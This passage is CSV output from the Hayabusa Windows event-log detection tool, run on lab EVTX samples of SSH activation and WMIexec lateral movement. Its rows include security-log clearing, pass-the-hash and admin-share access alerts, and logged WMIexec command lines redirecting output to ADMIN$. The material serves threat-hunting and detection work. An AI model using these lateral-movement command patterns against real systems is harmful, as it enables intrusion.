([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Save', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetGPO.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Save-NetGPO' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.923 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.923 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.924 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Open-NetGPO"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.924 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Save-NetGPO"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:39.096 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:43.030 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-NetFirewallRule): ""Get-NetFirewallRule"" ParameterBinding(Get-NetFirewallRule): name=""Name""; value=""*ssh*"" ParameterBinding(Get-NetFirewallRule): name=""All""; value=""False"" ParameterBinding(Get-NetFirewallRule): name=""PolicyStore""; value="""" ParameterBinding(Get-NetFirewallRule): name=""GPOSession""; value="""" ParameterBinding(Get-NetFirewallRule): name=""TracePolicyStore""; value=""False"" ParameterBinding(Get-NetFirewallRule): name=""ThrottleLimit""; value=""0"" ParameterBinding(Get-NetFirewallRule): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:43.031 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""MSFT_NetFirewallRule (CreationClassName = ""MSFT?FW?FirewallRule?OpenSSH-Server-In-..., PolicyRuleName = """", SystemCreationClassName = """", SystemName = """")""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:43.034 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:43.035 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 20:32:00.171 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189df8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:00.186 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x189df8,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189e94,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:01.293 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x189e94,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189f3b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189f62,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189f62,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:02.934 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189f84,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:02.996 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189f84,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189fa3,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:03.074 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189fa3,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x189fc0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:03.137 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x189fc0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:03.468 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1619090610.0007844 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x168 | User: FS03VULN$ | LID: 0x3e4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 127.0.0.1 | LID: 0x189fc0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:03.499 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:03.515 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:03.530 +09:00,fs03vuln.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1619090610.0007844 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x980 | User: FS03VULN$ | LID: 0x3e4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 127.0.0.1 | LID: 0x189fc0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:03.549 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619090610.0007844 | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:03.565 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x189f3b,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18acdd,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:16.801 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18ad01,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18ad10,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18ad1f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18ad01,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18ad10,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:16.817 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18ad1f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:27.649 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x18b247,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:28.551 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File 